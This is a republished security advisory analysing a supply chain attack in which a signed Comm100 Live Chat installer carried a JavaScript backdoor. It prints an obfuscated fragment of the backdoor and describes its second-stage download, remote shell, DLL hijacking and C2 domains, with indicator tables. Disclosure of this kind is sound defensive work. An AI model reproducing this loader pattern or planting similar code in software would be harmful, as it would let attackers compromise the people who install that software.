Supply Chain Attack via a Trojanized Comm100 Chat Installer
Published 11/02/2022
Originally published by CrowdStrike.
- Leveraging a combination of advanced machine learning and artificial intelligence, a new supply chain attack was identified during the installation of a chat-based customer engagement platform.
- The supply chain attack involved a trojanized installer for the Comm100 Live Chat application being deployed.
- Malware was delivered via a signed Comm100 installer that could be downloaded from the company’s website as recently as the morning of September 29, 2022.
- With moderate confidence, the actor responsible for this activity likely has a China nexus.
- Based on responsible disclosure, Comm100 has released an updated installer (10.0.9) that can be downloaded here.
Applying a combination of advanced machine learning (ML), artificial intelligence (AI) and deep analytics across the trillions of security events captured, a leading security company identified a new supply chain attack pattern during the installation of a chat based customer engagement platform.
The company confirmed that the supply chain attack involved a trojanized installer for the Comm100 Live Chat application. This attack occurred from at least September 27, 2022 through the morning of September 29, 2022. The trojanized file was identified at organizations in the industrial, healthcare, technology, manufacturing, insurance and telecommunications sectors in North America and Europe.
Attack Details
Malware is delivered via a signed Comm100 installer that was downloadable from the company’s website. The installer was signed on September 26, 2022 at 14:54:00 UTC using a valid Comm100 Network Corporation certificate.
The security company confirmed that the Microsoft Windows 7+ desktop agent hosted at https[:]//dash11.comm100[.]io/livechat/electron/10000/Comm100LiveChat-Setup-win.exe that was available until the morning of September 29 was a trojanized installer. Comm100 has since released an updated installer (10.0.9).
This installer (SHA256 hash: ac5c0823d623a7999f0db345611084e0a494770c3d6dd5feeba4199deee82b86) is an Electron application that contains a JavaScript (JS) backdoor within the file main.js of the embedded Asar archive.
(function(){if(!(typeof Buffer==="undefined")){require("http").get((function(){let b=Buffer.from('681c6818220d2243335a74157819630c620374077510600c6d143a59365b74187107620a6f03735c3f503c50355622','hex'); |
Figure 1. Initial JS Backdoor in main.js
The backdoor downloads and executes a second-stage script from URL http[:]//api.amazonawsreplay[.]com/livehelp/collect.
The second-stage script consists of obfuscated JS containing a backdoor that gathers host information before providing the actor with remote shell functionality by spawning a new instance of cmd.exe.
The script also uses the command-and-control (C2) domain api.amazonawsreplay[.]com.
As part of likely follow-on activity, the actor installed additional malicious files on the affected host, including a malicious loader DLL named MidlrtMd.dll executed by a legitimate copy of a Microsoft Metadata Merge Utility (mdmerge.exe) binary via DLL search-order hijacking. The loader DLL decrypts a payload file named license using a customized variant of RC4 encryption with the hard-coded key U9ELetx8eMR8pd5koFamoOyuf9tTRTPG.
The decrypted payload consists of shellcode that is executed in memory and injects an embedded payload into a new instance of notepad.exe. The injected payload connects to the malicious C2 domain api.microsoftfileapis[.]com, which resolved to the IP address 8.219.167[.]156 at the time of the incident.
Based on the company’s responsible disclosure, Comm100 has released an updated installer. Impacted Comm100 customers can download the latest exe version (10.0.9) here.
Comm100 further indicated it was performing a root cause analysis to obtain additional information.
Assessment
The payload delivered in this supply chain attack differs from payloads identified in previous incidents related to the same actor, targeting online gambling entities in Asia. Additionally, the recent activity differs from activity targeting online gambling in both the target scope and the supply chain attack mechanism delivering a trojanized app via Comm100’s website.
Despite these differences, the company assesses that the actor responsible for previously identified online gambling targeting is also likely responsible for these recent incidents. This assessment is made with moderate confidence based on the following factors:
- The use of chat software to deliver malware
- The use of the Microsoft Metadata Merge Utility binary to load a malicious DLL named MidlrtMd.dll
- C2 domain-naming convention using Microsoft and Amazon-themed domains along with api. subdomains
- C2 domains hosted on Alibaba infrastructure
Furthermore, with moderate confidence, this actor likely has a China nexus. This assessment is based on the presence of Chinese-language comments in the malware, aforementioned tactics, techniques and procedures (TTPs), and the connection to the targeting of online gambling entities in East and Southeast Asia — a previously established area of focus for China-nexus targeted intrusion actors.
Intelligence Confidence Assessment
High Confidence: Judgments are based on high-quality information from multiple sources. High confidence in the quality and quantity of source information supporting a judgment does not imply that that assessment is an absolute certainty or fact. The judgment still has a marginal probability of being inaccurate.
Moderate Confidence: Judgments are based on information that is credibly sourced and plausible, but not of sufficient quantity or corroborated sufficiently to warrant a higher level of confidence. This level of confidence is used to express that judgments carry an increased probability of being incorrect until more information is available or corroborated.
Low Confidence: Judgments are made where the credibility of the source is uncertain, the information is too fragmented or poorly corroborated enough to make solid analytic inferences, or the reliability of the source is untested. Further information is needed for corroboration of the information or to fill known intelligence gaps.
Indicators
SHA256 Hash | Comm100 File Version |
6f0fae95f5637710d1464b42ba49f9533443181262f78805d3ff13bea3b8fd45 (This file contains the same backdoor, but it has not been observed in the wild) | 10.0.72 |
ac5c0823d623a7999f0db345611084e0a494770c3d6dd5feeba4199deee82b86 | 10.0.8 |
Table 1. Trojanized Comm100 Application Executables
Filename | SHA256 Hash | Description |
C:\ProgramData\Cisco Core\CoreConnect.exe | ac9f2ae9de5126691b9391c990f9d4f1c25afa912fbfda2d4abfe9f9057bdd8c | Legitimate mdmerge.exe executable |
C:\ProgramData\Cisco Core\MidlrtMd.dll | 6194d57fc3bc35acf9365b764338adefacecfacf5955b87ad6a5b753fb6081f8 | Malicious loader DLL |
C:\ProgramData\Cisco Core\license | c930a28878a5dd49f7c8856473ff452ddbdab8099acd6900047d9b3c6e88edca | Encrypted payload configured with C2 domain api.microsoftfileapis[.]com |
Table 2. Observed Implant Likely Deployed by the Actor
Network Indicators | Description |
http[:]//api.amazonawsreplay[.]com/collect_log | JS backdoor logging URL |
http[:]//api.amazonawsreplay[.]com | JS backdoor C2 |
http[:]//api.amazonawsreplay[.]com/livehelp/init | JS backdoor C2 |
http[:]//api.microsoftfileapis[.]com | Encrypted payload C2 host |
https[:]//selfhelp[.]windowstearns[.]com | Related encrypted payload C2 host |
http[:]//api.amazonawsreplay[.]com/livehelp/collect | Staging URL for JS backdoor |
Table 3. Network Indicators Related to Activity Described in this Alert
Command Line | Description |
reg query \"hklm\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\" /v ProductId | Used in the JS backdoor to compute a MD5 victim hash |
Table 4. Command-Line Indicators Related to Activity Described in this Alert
Related Articles:
The Rise of Malicious AI: 5 Key Insights from an Ethical Hacker
Published: 01/03/2025
10 Fast Facts About Cybersecurity for Financial Services—And How ASPM Can Help
Published: 12/20/2024
The EU AI Act and SMB Compliance
Published: 12/18/2024
Decoding the Volt Typhoon Attacks: In-Depth Analysis and Defense Strategies
Published: 12/17/2024